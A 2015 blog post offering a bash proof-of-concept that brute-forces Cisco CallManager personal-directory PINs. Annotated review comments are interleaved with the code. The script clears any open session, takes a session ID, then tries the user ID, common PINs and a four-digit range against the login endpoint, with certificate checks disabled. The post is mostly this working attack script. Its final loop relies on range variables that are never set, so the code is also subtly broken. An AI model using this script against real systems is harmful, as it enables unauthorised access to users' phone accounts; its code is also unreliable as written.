Thursday, 2 April 2015

PoC for Cracking Cisco PINs

As a follow-up to the work done by Roberto SL here:

http://blog.malerisch.net/2012/10/callmanager-pin-bruteforce.html


I've gone ahead and written some quick-and-dirty PoC code for this.  Might be useful as a tool to remind people to use account lockout thresholds...

1:  #!/bin/bash  
    # PoC from the post: talks to the /ccmpd/ web endpoints on the host given
    # as $1, makes sure no session is already open from this client, and
    # obtains a session id (SID) that the later PIN attempts reuse.
    # Usage: $0 <ip> <user-id>
    #
    # NOTE(review): every curl call in this listing uses -k, which disables TLS
    # certificate verification, so nothing checks that the responses come from
    # the intended host. -s only silences curl's progress output.
2:  echo "Cisco VoIP Phone Pin Cracker, 2015 PWH"  
3:    
    # Only the zero-argument case is rejected. With a single argument the
    # script continues and $2 (the user id) is empty.
4:  if [ "$#" -eq 0 ]; then  
5:       echo "Usage: $0 <ip> <user-id>"  
6:       exit  
7:  fi  
8:    
9:  userid=$2  
10:  ccmip=$1  
11:    
12:  echo -e "Targeting user id $userid on $ccmip\n"   
13:  echo "Checking if already logged in... "  
    # A response containing 'Personal Address Book' is treated as "a session is
    # already open"; grep -q prints nothing and only sets the exit status.
14:  curl "https://$ccmip/ccmpd/pdCheckLogin.do?name=undefined" -ks | grep -q 'Personal Address Book'  
15:    
    # `echo $?` re-reads the status of the pipeline above (grep's status, since
    # pipefail is not set).
16:  if [ `echo $?` -eq 0 ]; then  
17:                           echo -n "+ IP already logged in, logging out... "  
                           # Three chained requests, innermost first:
                           #   1. fetch pdCheckLogin.do and take the text between the first '>'
                           #      and the next '<' on the line containing "LogoutPage";
                           #   2. fetch that value as a URL and extract the same way from the
                           #      line containing "logout";
                           #   3. fetch the resulting URL and discard the body.
                           # The extracted values are used as URLs without any validation.
18:                           curl -ks `curl -ks "\`curl "https://$ccmip/ccmpd/pdCheckLogin.do?name=undefined" -ks | grep LogoutPage | cut -d\> -f2 | cut -d\< -f1\`" | grep logout | cut -d\> -f2 | cut -d\< -f1` > /dev/null  
19:                           echo "Done"  
20:                      else  
21:                           echo "+ IP not logged in, proceeding to crack $userid..."  
22:                      fi  
23:    
24:  echo -ne "Grabbing a SID... "  
    # SID = text between the first '=' and the following '<' on each response
    # line containing "sid". If several lines match, all of them end up in SID.
25:  SID=`curl "https://$ccmip/ccmpd/pdCheckLogin.do?name=undefined" -ks | grep sid | cut -d\= -f2 | cut -d\< -f1`  
26:  echo $SID  
27:    
28:  function authattempt {  
                      # Sends one login request for a single candidate PIN and reports the result.
                      # Globals:   ccmip, SID, userid (read)
                      # Arguments: $1 - the PIN to try
                      # Outputs:   a status line on stdout
                      # Exits the shell it runs in on the first PIN that is not rejected.
                      #
                      # The sid, user id and PIN are all carried in the URL query string, so
                      # anything that records request URLs on the path or on the server will
                      # record them too. On the server side a run looks like repeated login.do
                      # requests for one userid with a changing pin value.
29:                      curl -ks "https://$ccmip/ccmpd/login.do?sid=$SID&userid=$userid&pin=$1" | grep -q 'Login Unsuccessful'  
                      # NOTE(review): success is inferred only from the absence of the string
                      # 'Login Unsuccessful'. An empty response (curl failure), an error page
                      # or any other reply without that text also takes the "worked" branch,
                      # so a reported hit is unconfirmed.
30:                      if [ `echo $?` -eq 0 ]; then  
                           # \r returns the cursor to column 0 so the next status overwrites this one.
31:                           echo -ne "$1 didn't work\\r"  
32:                      else  
                           # Trailing spaces blank out leftovers of the longer "didn't work" line.
33:                           echo "$1 worked         "  
34:                           exit  
35:                      fi  
36:  }  
37:    
38:  echo "Testing user-id as PIN... "  
39:  authattempt $userid  
40:  echo "Testing common PINs... "  
41:  authattempt 1234  
42:  authattempt 4321  
43:  authattempt 0000  
44:  authattempt 1111  
45:  authattempt 2222  
46:  authattempt 3333  
47:  authattempt 4444  
48:  authattempt 5555  
49:  authattempt 6666  
50:  authattempt 7777  
51:  authattempt 8888  
52:  authattempt 9999  
53:  authattempt 0123  
54:  echo "Bruteforcing range... "  
55:  seq -f "%04.f" $rangeBegin $rangeEnd | while read line; do authattempt $line; done   
56: